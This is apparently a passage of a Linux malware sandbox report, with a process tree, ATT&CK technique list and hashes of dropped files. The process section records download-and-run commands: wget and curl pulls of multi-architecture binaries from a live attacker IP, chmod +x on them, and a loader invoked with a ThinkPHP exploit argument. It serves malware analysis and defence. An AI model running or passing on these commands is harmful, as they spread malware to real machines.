  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64
  2⤵
  PID:1581
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86_64
  2⤵
  PID:1583
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 db0fa4b8db0333367e9bda3ab68b8042.x86_64 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1585
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
  2⤵
  - Writes file to tmp directory
  PID:1586
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arc
  2⤵
  PID:1588
- /bin/chmod
  chmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arc db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 db0fa4b8db0333367e9bda3ab68b8042.x86_64 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk1
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /tmp/load.sh
  ./load.sh thinkphp.exploit
  2⤵
  - Executes dropped EXE
  PID:1590

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
33KB

MD5
6d1b6e91b1e2037fbf62ca7ddcf04932

SHA1
d0769095ec2e678074eb206b3537022129c1a776

SHA256
7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

SHA512
7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

Download Submit
/tmp/load.sh

Filesize
35KB

MD5
fd5d7deebbb62aee931a1701a1042450

SHA1
4adc94ce9de13647815a16d6514b73e109c80785

SHA256
7a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9

SHA512
cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4

Download Submit
/tmp/load.sh

Filesize
37KB

MD5
144cc0c6dfb6f6e395065b02825a9ad1

SHA1
dfe5d7d8bef4511b42be1ae0235f7469d97bf789

SHA256
117cd63b79b8c0d3753ac6907206872d6527c2d6a641776c1021302d5dcec2b2

SHA512
9e5ca9ee3ebef09688d74de6bb4af9d6c1003173ee5846cd2370d4774e9bc92fef317113b19529cd2a5b1d18a38a626ebf6ed2da05e6c7b66e0d1b69d8ddc5d5

Download Submit
/tmp/load.sh

Filesize
34KB

MD5
b478298246ee6d313f4f576d0f7ec4cd

SHA1
94d25c6d4cfb1e218120d378d14c8d5ab868363b

SHA256
ed04f35cc6c4bef7ea8bf398436da916ebfab2490c10bd1d59df70f648e80df5

SHA512
83f67116e5c7074dcfa0e98d94697a0db2bdcaed15060aa31ed6a20eb543fd1d10d8fe26856178f78cc7402531de358e4b6c1d294086b18ab891d23954e78307

Download Submit
/tmp/load.sh

Filesize
30KB

MD5
d8893525da7152c787dcc7d6309a61ba

SHA1
87fa7fb894caaa77a9caa7bca6a5fd3fbe09f7cd

SHA256
2a1b03ac26cc72118fb419de4bee3352adf536ee4d5472e8cee14150ca53b8ef

SHA512
8fcf808c627c080350adcf005df853a6c1f3fb3e3b2b5d2745a972dcc4064ff731f7cebbbd7d4e8c9ade91727f587356f844b783fa6c90a2191b80a38ca1f6e6

Download Submit
/tmp/load.sh

Filesize
89KB

MD5
4c11e8b7fbda3e4bedc53c8207e862b0

SHA1
762527ff34f3203f0054691760fe2586d1da6e8b

SHA256
e588912ddd689a87e98d7d86b78dbf7965f09681cd9193f1d028c173e0e4260a

SHA512
5678b7e300c8d23d25c8185e4749b8b978d6c3fd2b4e2f7ded638d86bd88a6361e5ad690b72bc15f4e2f3606a0831bfe1d624cb59292e35e069fecab83886f6d

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads